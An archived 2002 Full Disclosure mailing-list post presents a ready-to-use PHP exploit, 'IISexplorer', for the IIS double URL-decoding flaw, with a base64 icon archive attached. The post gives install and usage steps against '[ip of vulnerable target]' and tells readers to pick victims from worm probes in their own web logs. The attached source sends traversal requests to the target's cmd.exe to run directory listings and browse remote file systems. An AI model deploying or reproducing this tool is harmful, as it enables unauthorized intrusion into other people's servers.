Full Disclosure mailing list archives
IIS double UTF decoding bug (old) exploit: IIS explorer
From: full-disclosure () lists netsys com (Berend-Jan Wever)
Date: Thu, 11 Jul 2002 17:28:06 +0200
This is a multi-part message in MIME format.
------=_NextPart_000_000A_01C22900.51AF7FB0
Content-Type: multipart/alternative;
boundary="----=_NextPart_001_000B_01C22900.51AF7FB0"
------=_NextPart_001_000B_01C22900.51AF7FB0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
(Ok, it's an old bug but since a lot of non-geeks seem to hate updating =
their IIS, there still are plenty of valid targets for this exploit.)
-- SCRIPT KIDDIE COMPATIBLE EXPLOIT ATTACHED --
The attached file IISexploere.php is my "SCRIPT KIDDIE COMPATIBLE" =
exploit for the double urldecoding bug in IIS. (It's a modified version =
of PHPexplorer, also written by yours truly ;)
-- HOW TO INSTALL --
Simply put all the icons in the RAR file and the file IISexplorer.php on =
your PHP enabled webserver. The icons should go into the /icons2/ =
directory, the IISexplorer.php file can be put anywere.
-- HOW TO USE --
Browse to http://your-server/path/IISexplorer.php?host=3D[ip of =
vulnerable target] and you can browse the target system using an =
explorer style interface.
Please remember, this is version 0.1 beta! So don't expect it to handle =
errors well.
-- WHERE TO FIND TARGETS TO EXPLORE --
Scan your webserver's logfiles for "GET =
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" to get a list of =
vulnerable IIS's that have been infected with a worm that propagates =
through this vulnerability.
-- NOTES --
The left frame takes some time to load, since it requires 1 http request =
for each directory in the list. Make sure to have a decent connection to =
the internet because this migth use quite some bandwidth ;)
-- FUTURE VERSIONS --
I'm probably not gonna invest more time, since it works. Maybe I'm gonna =
put in a upload/download facility but that would make stuff a bit too =
easy for them 14 year olds, wouldn't it ?
-- YOURS TRULY --
Berend-Jan Wever aka SkyLined
http:/spoor12.edup.tudelft.nl
.
------=_NextPart_001_000B_01C22900.51AF7FB0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2716.2200" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>(Ok, it's an old bug but since a lot of =
non-geeks=20
seem to hate updating their IIS, there still are plenty of valid targets =
for=20
this exploit.</FONT><FONT face=3DArial size=3D2>)</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>-- SCRIPT KIDDIE COMPATIBLE EXPLOIT =
ATTACHED=20
--</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>The attached file IISexploere.php is my =
"SCRIPT=20
KIDDIE COMPATIBLE" exploit for the double urldecoding bug in IIS. (It's =
a=20
modified version of PHPexplorer, also written by yours truly =
;)</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>-- HOW TO INSTALL --</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Simply put all the icons in the RAR =
file and the=20
file IISexplorer.php on your PHP enabled webserver. The icons should go =
into the=20
/icons2/ directory, the IISexplorer.php file can be put =
anywere.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>-- HOW TO USE --</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Browse to <A=20
href=3D"http://your-server/path/IISexplorer.php?host=3D[ip of vulnerable =
target]">http://your-server/path/IISexplorer.php?host=3D[ip=20
of vulnerable target]</A> and you can browse the target system =
using an=20
explorer style interface.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Please remember, this is version 0.1 =
beta! So don't=20
expect it to handle errors well.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>
<DIV><FONT face=3DArial size=3D2>-- WHERE TO FIND TARGETS TO EXPLORE =
--</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Scan your webserver's logfiles for "GET =
/scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" to get a list of=20
vulnerable IIS's that have been infected with a worm that propagates =
through=20
this vulnerability.</FONT></DIV>
<DIV> </DIV>
<DIV>-- NOTES --</DIV></FONT></DIV>
<DIV><FONT face=3DArial size=3D2>The left frame takes some time to load, =
since it=20
requires 1 http request for each directory in the list. </FONT><FONT =
face=3DArial=20
size=3D2>Make sure to have a decent connection to the internet because =
this migth=20
use quite some bandwidth ;)</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>-- FUTURE VERSIONS --</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>I'm probably not gonna invest more =
time, since it=20
works. Maybe I'm gonna put in a upload/download facility but that would =
make=20
stuff a bit too easy for them 14 year olds, wouldn't it ?</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>-- YOURS TRULY --</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Berend-Jan Wever aka =
SkyLined</FONT></DIV>
<DIV><FONT face=3DArial =
size=3D2>http:/spoor12.edup.tudelft.nl</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>.</FONT></DIV></BODY></HTML>
------=_NextPart_001_000B_01C22900.51AF7FB0--
------=_NextPart_000_000A_01C22900.51AF7FB0
Content-Type: application/octet-stream;
name="IISexplorer.php"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
filename="IISexplorer.php"
<HTML><?php
//--- copyright information =
---------------------------------------------------
global $program_name; $program_name =3D 'PHP Explorer v0.3 beta';
global $copyright; $copyright =3D "\n".
=
"-----------------------------------------------------------------------\=
n".
$program_name." - Written in may and june 2002 by B.J.W. Wever.\n".
"Copyright (C) 2002 Berend-Jan Wever <SkyLined () edup tudelft nl>\n".
"http://Spoor12.edup.tudelft.nl/SkyLined\n";.
"\n".
"This program is free software; you can redistribute it and/or\n".
"modify it under the terms of the GNU General Public License\n".
"version 2, 1991 as published by the Free Software Foundation.\n".
"\n".
"This program is distributed in the hope that it will be useful,\n".
"but WITHOUT ANY WARRANTY; without even the implied warranty of\n".
"MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n".
"GNU General Public License for more details.\n".
"\n".
"A copy of the GNU General Public License can be found at:\n".
" http://www.gnu.org/licenses/gpl.html\n";.
"or you can write to:\n".
" Free Software Foundation, Inc.\n".
" 59 Temple Place - Suite 330\n".
" Boston, MA 02111-1307\n".
" USA.\n".
=
"-----------------------------------------------------------------------\=
n";
//--- initialise global variables =
---------------------------------------------
global $link_header; $link_header =3D $_SERVER['PHP_SELF'];
global $path_root; $path_root =3D '';
global $path_open; $path_open =3D '';
global $hostname; $hostname =3D '';
$i_am_tree =3D false;
$i_am_list =3D false;
//--- read parameters =
---------------------------------------------------------
$parameters =3D explode('&', $argv[0]);
for ($i=3D0; $i<count($parameters); $i++) {
list($parameter, $value) =3D explode('=3D', $parameters[$i], 2);
switch ($parameter) {
case "root" : $path_root =3D make_valid_path(urldecode($value)); =
break;
case "open" : $path_open =3D make_valid_path(urldecode($value)); =
break;
case "host" : $hostname =3D urldecode($value); break;
case "tree" : $i_am_tree =3D true; break;
case "list" : $i_am_list =3D true; break;
}
}
//--- handle file uploads =
-----------------------------------------------------
if ($_SERVER['REQUEST_METHOD']=3D=3D'POST') {
$source_path =3D $HTTP_POST_FILES['userfile']['tmp_name'];
$destination_path =3D =
'./'.make_valid_path($path_open.'/'.$HTTP_POST_FILES['userfile']['name'])=
;
move_uploaded_file($source_path, $destination_path);
}
//--- display the index, the tree or the list =
---------------------------------
if ($hostname =3D=3D '') {
echo wrap_rem($copyright);
echo wrap_body('<H1>Host not specified</H1>Please use =
"../IISexplorer.php?host=3D<I>ip or hostname</I>."');
} elseif (!$i_am_tree && $i_am_list) {
echo create_header().wrap_body(create_list($path_open));
} elseif ($i_am_tree && !$i_am_list) {
echo create_header().wrap_body(create_tree(false, '', $path_root, =
true));
} else {
echo wrap_rem($copyright);
if (!$i_am_tree && !$i_am_list) {
echo '<FRAMESET framespacing=3D"0" frameborder=3D"no" cols=3D"300, =
*">'.
'<FRAME name=3D"tree" style=3D"border-right: 2px inset" =
src=3D"'.$link_header.'?tree&'.implode('&', $argv).'">'.
'<FRAME name=3D"main" style=3D"border-left: 2px inset" =
src=3D"'.$link_header.'?list&'.implode('&', $argv).'">'.
'</FRAMESET>';
} else {
echo wrap_body("<H1>Illegal command line option</H1> IISexplorer =
can't be <B>tree</B> <I>and</I> <B>list</B> at the same time.");
}
}
//-----------------------------------------------------------------------=
------
//--- list creating function =
--------------------------------------------------
function create_list($path) {
global $hostname, $path_root, $path_open;
$result =3D '<TR><TD><BUTTON style=3D"width:100%; =
text-align:left;">Name</BUTTON>'.
'<TD><BUTTON style=3D"width:100%; =
text-align:left;">Size</BUTTON>';
$total_size =3D 0;
list($success, $dirs, $files) =3D get_directory_contents($path);
if ($success) {
if (count($dirs)>0) {
sort($dirs);
for ($i=3D0; $i<count($dirs); $i++) {
$result .=3D '<TR><TD><NOBR>'.show_dir('', $dirs[$i]).
'<TD class=3D"nosize"><NOBR><DIR>';
}
}
if (count($files)>0) {
sort($files);
for ($i=3D0; $i<count($files); $i++) {
if (substr($files[$i], -5)=3D=3D'.phpe') {
$result .=3D '<TR><TD><NOBR>'.show_phpe($files[$i]);
} else {
$result .=3D '<TR><TD><NOBR>'.show_file($files[$i]);
}
// $result .=3D '<TD =
class=3D"size"><NOBR>'.readable_size(filesize($files[$i]));
// $total_size +=3D filesize($files[$i]);
$total_size =3D 0;
}
}
}
// $disk_free_percentage =3D round(100* =
disk_free_space('./'.$path_open) / disk_total_space('./'.$path_open));
$result =3D '<FORM id=3D"oForm" enctype=3D"multipart/form-data" =
method=3D"post" =
action=3D"?list&host=3D'.$hostname.'&root=3D'.$path_root.'&open=3D'.$path=
_open.'">'.
'<TABLE width=3D"100%">'.$result.'</TABLE>'.
'<CENTER>'.
'<HR>'.
'<B>'.count($dirs).' </B>'.one_or_many(count($dirs), =
'directory', 'directories').', '.
'<B>'.count($files).' </B>'.one_or_many(count($files), =
'file', 'files').', '.
'</CENTER>'.
'</FORM>';
/*
'<HR>'.
'<NOBR>'.
'To <B>upload</B> a file click '.
'<INPUT type=3D"file" name=3D"userfile" =
style=3D"border:0px; width:0%; height:18px;">'.
' and select a file, then click '.
'<INPUT type=3D"submit" value=3D"Upload" =
style=3D"border:0px; height:18px;">'.
' to upload the file.'.
'</NOBR>'.
'disk space used: =
<B>'.readable_size($total_size).'</B>, '.
'free disk space: =
<B>'.readable_size(disk_free_space('./'.$path_open)).'</B>.'.
'<TABLE width=3D"90%"><TR>'.
'<TD class=3D"useddiskspace" =
width=3D"'.(100-$disk_free_percentage).'%">'.(100-$disk_free_percentage).=
'% used'.
'<TD =
class=3D"freediskspace">'.$disk_free_percentage.'% free'.
'</TABLE>'.
*/
return $result;
}
//-----------------------------------------------------------------------=
------
//--- tree creating function =
--------------------------------------------------
function create_tree($show_header, $header, $path, $last_entrie) {
$result =3D ($show_header ? $header.create_icon('tree'.($last_entrie =
? '_last' : '')) : '').
create_icon('folder_error').last_part($path).'<BR>';
list($success, $dirs, $files) =3D get_directory_contents($path);
if ($success) {
$icon1 =3D 'tree'.($last_entrie ? '_last' : '');
if (count($dirs)>0) $icon1 .=3D '_branched'. (is_open($path) ? =
'_open' : '_closed');
$icon2 =3D 'tree'.($last_entrie ? '_empty' : '_straight');
if ($show_header) {
$ownheader =3D $header.create_icon($icon1);
$subheader =3D $header.create_icon($icon2);
} else {
$ownheader =3D '';
$subheader =3D '';
}
$result =3D show_dir($ownheader, $path)."<BR>";
if (count($dirs)>0 && is_open($path)) {
sort($dirs);
for ($i=3D0; $i<count($dirs); $i++) {
$result .=3D create_tree(true, $subheader, $dirs[$i], =
$i=3D=3Dcount($dirs)-1);
}
}
}
return $result;
}
//-----------------------------------------------------------------------=
------
//--- general functions =
-------------------------------------------------------
function show_dir($header, $path) {
global $path_open;
$name =3D last_part($path);
if ($name =3D=3D '') { $name =3D first_part($_SERVER['PHP_SELF']); }
$link =3D create_phpexplorer_url($path);
if ($path =3D=3D $path_open) {
$result =3D $header.wrap_class('open', =
create_icon('folder_open').$name);
} else {
$result =3D $header.create_icon('folder_closed').$name;
}
return wrap_A('_top', $link, $result);
}
function show_file($path) {
$name =3D last_part($path);
$link =3D =
'/'.make_valid_path(make_valid_path(first_part($_SERVER['PHP_SELF'])).'/'=
.make_valid_path($path));
$icon =3D find_icon($path);
return wrap_A('_blank', $link, create_icon($icon).$name);
}
function show_phpe($path) {
$name =3D substr(last_part($path), 0, strlen(last_part($path))-5);
$link =3D =
'/'.make_valid_path(make_valid_path(first_part($_SERVER['PHP_SELF'])).'/'=
.make_valid_path($path));
$icon =3D find_icon($path);
$phpe =3D file($path);
for ($i=3D0; $i<count($phpe); $i++) {
if (substr($phpe[$i], 0, 5)=3D=3D'ICON=3D') $icon =3D =
substr($phpe[$i], 5, 256);
if (substr($phpe[$i], 0, 5)=3D=3D'LINK=3D') $link =3D =
substr($phpe[$i], 5, 256);
}
return wrap_A('_blank', $link, create_icon($icon).$name);
}
//-----------------------------------------------------------------------=
------
//-----------------------------------------------------------------------=
------
function is_open($path) {
global $path_open;
return strstr($path_open.'/', $path.'/') !=3D=3D false;
}
function make_valid_path($path) {
while (substr($path, 0, 2) =3D=3D './') $path =3D substr($path, 2, =
strlen($path)-2);
while (substr($path, 0, 1) =3D=3D '/') $path =3D substr($path, 1, =
strlen($path)-1);
while (substr($path, -1) =3D=3D '/') $path =3D substr($path, 0, =
strlen($path)-1);
if ($path =3D=3D '.') {
$path =3D '';
} elseif ( (strstr($path, '..') !=3D=3D false) ||
(strstr($path, '//') !=3D=3D false) ||
(substr($path, 0, 1) =3D=3D '/') ) {
$path =3D '';
}
return $path;
}
function last_part($path) {
if (($result =3D substr(strrchr($path, '/'), 1)) =3D=3D=3D false)
$result =3D $path;
return $result;
}
function first_part($path) {
return dirname($path);
}
//-----------------------------------------------------------------------=
------
//-----------------------------------------------------------------------=
------
function create_header() {
return '<HEAD><STYLE>'.
'BODY, IMG, TABLE, TR, TD, A, A:visited, A:active {'.
'margin:0px; '.
'border:0px; '.
'padding:0px; '.
'font:14 tahoma,sans-serif; '.
'vertical-align:top; '.
'text-decoration:none; '.
'border-collapse:collapse; '.
'border-spacing:0; '.
'} '.
'BUTTON, INPUT {'.
'font:14 tahoma,sans-serif; '.
'vertical-align:top; '.
'padding-left:5px; '.
'height:22; '.
'}'.
'.open {'.
'background:silver; '.
'}'.
'.nosize {'.
'color:silver; '.
'text-align:center; '.
'}'.
'.size {'.
'text-align:right; '.
'}'.
'.useddiskspace {'.
'color: white; '.
'font-weight: bold; '.
'border: 1px solid black; '.
'background-color:maroon; '.
'}'.
'.freediskspace {'.
'color: white; '.
'font-weight: bold; '.
'text-align:right; '.
'border: 1px solid black; '.
'background-color:green; '.
'}'.
'</STYLE></HEAD>';
}
function wrap_rem($innerHTML) { return =
'<!--'.$innerHTML.'-->'; }
function wrap_body($innerHTML) { return =
'<BODY><NOBR>'.$innerHTML.'</NOBR></BODY>'; }
function wrap_class($class, $innerHTML) { return '<SPAN =
class=3D"'.$class.'">'.$innerHTML.'</SPAN>'; }
function wrap_A($target, $href, $innerHTML) { return '<A =
target=3D"'.$target.'" href=3D"'.$href.'">'.$innerHTML.'</A>'; }
function create_icon($icon) { return '<IMG =
src=3D"/icons2/19x18_'.$icon.'.gif">'; }
function create_phpexplorer_url($path) { global $hostname, =
$path_root; return =
'?host=3D'.$hostname.'&root=3D'.$path_root.'&open=3D'.$path; }
function find_icon($path) {
$file_array =3D explode('.', $path);
switch ($file_array[count($file_array)-1]) {
case "jpg" : $icon =3D 'file_image'; break;
case "gif" : $icon =3D 'file_image'; break;
case "png" : $icon =3D 'file_image'; break;
case "doc" : $icon =3D 'file_document'; break;
case "txt" : $icon =3D 'file_text'; break;
case "xls" : $icon =3D 'file_excell'; break;
case "html" : $icon =3D 'ie'; break;
case "htm" : $icon =3D 'ie'; break;
case "php" : $icon =3D 'ie'; break;
case "link" : $icon =3D 'folder_link'; $link =3D implode('', =
file($path)); break;
default : $icon =3D 'file'; break;
}
return $icon;
}
function readable_size($size) {
$size2 =3D 'bytes';
if ($size >=3D 1024*1024*1024) {
$size =3D eregi_replace("([0-9]\.[0-9])[0-9]*", "\\1", =
$size/(1024*1024*1024));
$size2 =3D 'Gb';
} elseif ($size >=3D 1024*1024) {
$size =3D eregi_replace("([0-9]\.[0-9])[0-9]*", "\\1", =
$size/(1024*1024));
$size2 =3D 'Mb';
} elseif ($size >=3D 1024) {
$size =3D eregi_replace("([0-9]\.[0-9])[0-9]*", "\\1", =
$size/(1024));
$size2 =3D 'Kb';
}
return $size.' '.$size2;
}
function one_or_many($count, $one, $many) {
return ($count=3D=3D1 ? $one : $many);
}
function get_directory_contents($path) {
global $hostname;
$result =3D false;
$temp =3D urlencode('..\\..'.(substr($path, 0, 1) =3D=3D '\\' ? '' : =
'\\').str_replace('/', '\\', $path));
$command =3D =
'http://'.$hostname.'/scripts/..%252F../winnt/system32/cmd.exe?/c+dir+/A+=
/-C+/X+'.$temp;
if (($directory_handle =3D fopen($command, 'r')) !=3D=3D false) {
if (($temp =3D fgets($directory_handle, 1024)) !=3D=3D false) {
// 1st line: " Directory of x:\xxxxx"
$result =3D (substr($temp, 0, 14) =3D=3D ' Directory of ');
while (($temp =3D fgets($directory_handle, 1024)) !=3D=3D false) =
{
// "dd/mm/yyyy hh:mma <DIR> xxxxx FILENAME.EXT =
LONGFILENAME..."
// "0.10...... 12.6.. 19.19.............. 39.12....... =
55.X..........."
if (strlen($temp) > 55) {
// 2nd line: ""
// 1st to last: " xxxxx File(s) xxxxx =
bytes"
// last line: " xxxxx Dir(s) xxxxx =
bytes free"
$date =3D substr($temp, 0, 10);
$time =3D substr($temp, 12, 6);
$size =3D trim(substr($temp, 19, 19));
$dosname =3D trim(substr($temp, 39, 12));
$fullname =3D trim(substr($temp, 55));
$name =3D ($dosname =3D=3D '' ? $fullname : $dosname);
if (substr($name, 0, 1) !=3D '.') {
if ($size =3D=3D '<DIR>') {
$dirs[] =3D make_valid_path($path.'/'.$name);
} else {
$files[] =3D make_valid_path($path.'/'.$name);
}
}
}
}
}
fclose($directory_handle);
}
return array($result, $dirs, $files);
}
?></HTML>
------=_NextPart_000_000A_01C22900.51AF7FB0
Content-Type: application/x-rar-compressed;
name="icons2.rar"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="icons2.rar"
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
